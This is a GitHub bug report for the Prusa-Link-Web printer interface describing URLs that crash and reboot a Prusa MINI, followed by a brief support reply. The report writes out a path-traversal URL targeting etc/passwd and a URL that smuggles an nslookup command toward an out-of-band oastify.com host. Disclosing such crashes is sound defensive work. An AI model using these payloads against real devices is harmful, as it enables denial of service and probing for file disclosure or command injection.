Prusa-Link-Web icon indicating copy to clipboard operation
Prusa-Link-Web copied to clipboard

Published 20 hours ago verified publisher icon prusa3d

[BUG] Long URL causes crash and reboot.

Open derenma opened this issue 3 years ago • 1 comments

Printer type - [MINI]

Printer firmware version - 4.4.0-RC1

Original or Custom firmware - RC1

Optional upgrades - Bondtech extruder/Filament sensor

USB drive or USB/Octoprint - USB

Describe the bug Printer crash & reboot with the following URL: http://192.168.1.12/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd (You may have to play with the number of "..%5c"

Additional crashing URL http://192.168.1.12/robots.txt%7cnslookup%20-q%3dcname%20l2oux1cnc4o7cyvi47cnwa5b92fv3orkfb7yxmm.oastify.com.%26

How to reproduce Change IP address in above URL to match printer and it will crash and reboot the printer. (URL encoding will bypass the limit set for error code 414?)

This was discovered when I was testing a scanning tool on my network and I noticed my printer kept rebooting. I don't really think this issue is a concern unless someone puts their printer on the public internet.

Expected behavior 414: URI Too long

Crash dump file

(.rar renamed to .txt)

CrashDump.rar.txt

derenma avatar Nov 22 '22 17:11 derenma

Hello! Thank you for your report, sorry that I reply so late - sorry for the lack of info on this so far, but in case of anything from our side, we'll definitely update this thread.

Alessandro Pantaleo Prusa Research

Prusa-Support avatar Jan 10 '23 16:01 Prusa-Support